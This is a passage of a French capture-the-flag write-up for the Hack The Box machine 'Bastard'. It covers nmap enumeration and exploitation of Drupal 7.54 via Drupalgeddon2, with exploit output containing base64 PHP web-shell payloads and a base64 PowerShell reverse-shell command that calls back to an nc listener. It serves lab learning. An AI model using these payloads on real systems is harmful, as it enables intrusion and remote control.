class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">9f15.....9bf4 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours bien vérifier les scripts trouvés. Debug puis trouver l&rsquo;erreur. Attention au guillemets suspects, toujours remplacer par &lsquo;&quot;&rsquo; ou &lsquo;&quot;&rsquo;.</li> </ul>https://leopoldabgn.github.io/writeups/p/bastard-htb/Fri, 11 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bastard-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bastard cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bastard</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.9</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -vvv 10.10.10.9 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-11 15:53 CEST </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORTSTATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">36</span> disallowed entries </span></span><span class="line"><span class="cl"><span class="p">|</span> /includes/ /misc/ /modules/ /profiles/ /scripts/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php </span></span><span class="line"><span class="cl"><span class="p">|</span> /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /user/register/ /user/password/ /user/login/ /user/logout/ /?q<span class="o">=</span>admin/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /?q<span class="o">=</span>comment/reply/ /?q<span class="o">=</span>filter/tips/ /?q<span class="o">=</span>node/add/ /?q<span class="o">=</span>search/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_/?q<span class="o">=</span>user/password/ /?q<span class="o">=</span>user/register/ /?q<span class="o">=</span>user/login/ /?q<span class="o">=</span>user/logout/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Drupal <span class="m">7</span> <span class="o">(</span>http://drupal.org<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Welcome to Bastard <span class="p">|</span> Bastard </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49154/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">Device type: general purpose<span class="p">|</span>phone<span class="p">|</span>specialized </span></span><span class="line"><span class="cl">Running <span class="o">(</span>JUST GUESSING<span class="o">)</span>: Microsoft Windows 8<span class="p">|</span>Phone<span class="p">|</span>2008<span class="p">|</span>7<span class="p">|</span>8.1<span class="p">|</span>Vista<span class="p">|</span><span class="m">2012</span> <span class="o">(</span>92%<span class="o">)</span> </span></span><span class="line"><span class="cl">OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">Aggressive OS guesses: Microsoft Windows 8.1 Update <span class="m">1</span> <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows Phone 7.5 or 8.0 <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 or Windows 8.1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 SP1 or Windows <span class="m">8</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> SP2 or <span class="m">2008</span> R2 SP1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Vista SP0 or SP1, Windows Server <span class="m">2008</span> SP1, or Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span> </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span><span class="nb">test</span> conditions non-ideal<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="drupal-754">Drupal 7.54 </h3><p>On découvre sur le port 80 une page de login. Il est mentionné qu&rsquo;il s&rsquo;agit d&rsquo;un site web Drupal. On trouve la version de Drupal dans un fichier changelog.txt :</p> <blockquote> <p>http://10.10.10.9/changelog.txt Drupal 7.54, 2017-02-01</p> </blockquote> <h3 id="cve-2018-7600--drupalgeddon2">CVE-2018-7600 | drupalgeddon2 </h3><p>En utilisant searchsploit, on trouve une RCE qui ne necessite pas d&rsquo;authentification et qui fonctionne pour les versions avant 7.58 (donc OK pour 7.54).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit drupal 7.54 </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution <span class="p">|</span> php/webapps/44449.rb </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ searchsploit -m php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Exploit: Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution </span></span><span class="line"><span class="cl"> URL: https://www.exploit-db.com/exploits/44449 </span></span><span class="line"><span class="cl"> Path: /opt/tools/exploitdb/exploits/php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Codes: CVE-2018-7600 </span></span><span class="line"><span class="cl"> Verified: True </span></span><span class="line"><span class="cl">File Type: Ruby script, ASCII text </span></span><span class="line"><span class="cl">Copied to: /workspace/drupwn/44449.rb </span></span></code></pre></td></tr></table> </div> </div><p>On lance l&rsquo;exploitation, et on obtient directement un shell non-interactif sur lequel on peut executer des commandes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ruby 44449.rb http://10.10.10.9 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> --<span class="o">==[</span>::#Drupalggedon2::<span class="o">]==</span>-- </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Target : http://10.10.10.9/ </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Found : http://10.10.10.9/CHANGELOG.txt <span class="o">(</span>HTTP Response: 200<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Drupal!: v7.54 </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Form <span class="o">(</span>user/password<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Form valid </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Clean URLs </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : Clean URLs enabled </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Code Execution <span class="o">(</span>Method: name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Result : CGATSMRW </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Good News Everyone! Target seems to be exploitable <span class="o">(</span>Code execution<span class="o">)</span>! w00hooOO! </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>./<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Existing file <span class="o">(</span>http://10.10.10.9/sites/default/files/shell.php<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Response: HTTP <span class="m">404</span> // Size: <span class="m">12</span> </span></span><span class="line"><span class="cl">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Testing: Writing To Web Root <span class="o">(</span>sites/default/files/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Moving : ./sites/default/files/.htaccess </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak<span class="p">;</span> <span class="nb">echo</span> PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 <span class="p">|</span> base64 -d <span class="p">|</span> tee sites/default/files/shell.php </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Target is NOT exploitable <span class="o">[</span>2-4<span class="o">]</span> <span class="o">(</span>HTTP Response: 404<span class="o">)</span>... Might not have write access? </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> FAILED : Couldn<span class="err">&#39;</span>t find a writeable web path </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dropping back to direct OS commands </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 09:04 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">317</span> .editorconfig </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">174</span> .gitignore </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.969 .htaccess </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 6.604 authorize.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 110.781 CHANGELOG.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.481 COPYRIGHT.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">720</span> cron.php </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; includes </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">529</span> index.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">703</span> install.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��17.995 INSTALL.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��18.092 LICENSE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 8.710 MAINTAINERS.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; misc </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; modules </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; profiles </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 5.382 README.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.189 robots.txt </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; scripts </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; sites </span></span><span class="line"><span class="cl">19/03/2017 01:43 �� &lt;DIR&gt; themes </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��19.986 update.php </span></span><span class="line"><span class="cl">19/03/2017 01:42 ��10.123 UPGRADE.txt </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� 2.200 web.config </span></span><span class="line"><span class="cl">19/03/2017 01:42 �� <span class="m">417</span> xmlrpc.php </span></span><span class="line"><span class="cl"> <span class="m">21</span> File<span class="o">(</span>s<span class="o">)</span> 217.261 bytes </span></span><span class="line"><span class="cl"> <span class="m">9</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.135.231.488 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; dir C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl">Volume in drive C has no label. </span></span><span class="line"><span class="cl"> Volume Serial Number is C4CD-C60B </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory of C:<span class="se">\U</span>sers </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; . </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; .. </span></span><span class="line"><span class="cl">19/03/2017 02:20 �� &lt;DIR&gt; Administrator </span></span><span class="line"><span class="cl">19/03/2017 02:54 �� &lt;DIR&gt; Classic .NET AppPool </span></span><span class="line"><span class="cl">19/03/2017 08:35 �� &lt;DIR&gt; dimitris </span></span><span class="line"><span class="cl">14/07/2009 07:57 �� &lt;DIR&gt; Public </span></span><span class="line"><span class="cl"> <span class="m">0</span> File<span class="o">(</span>s<span class="o">)</span> <span class="m">0</span> bytes </span></span><span class="line"><span class="cl"> <span class="m">6</span> Dir<span class="o">(</span>s<span class="o">)</span> 4.134.649.856 bytes free </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">drupalgeddon2&gt;&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\d</span>imitris<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">292f.....ec9d </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable Shell </h3><p>En allant sur <a class="link" href="https://www.revshells.com/" target="_blank" rel="noopener" >https://www.revshells.com/</a>, j&rsquo;ai pu générer rapidement un script de revershell. J&rsquo;ai utilisé :</p> <ul> <li>PowerShell #3 (Base64)</li> </ul> <p>Ce qui m&rsquo;a donné la commande suivante. Pratique, car aucun caractère spécial.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">powershell -e <span class="nv">JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA</span><span class="o">==</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">exegol-pentest Bastard $ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.9:57491. </span></span><span class="line"><span class="cl">PS C:<span class="se">\i</span>netpub<span class="se">\d</span>rupal-7.54&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\i</span>usr </span></span></code></pre></td></tr></table> </div> </div><h3 id="better-stable-shell">Better Stable Shell </h3><p>J&rsquo;ai trouvé un moyen de faire un shell encore plus stable. Le privesc ne marchait meme pas avec l&rsquo;autre shell&hellip; On ne voyait pas les erreurs non plus. Il vaut mieu generer avec msfvenom un shell.exe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span 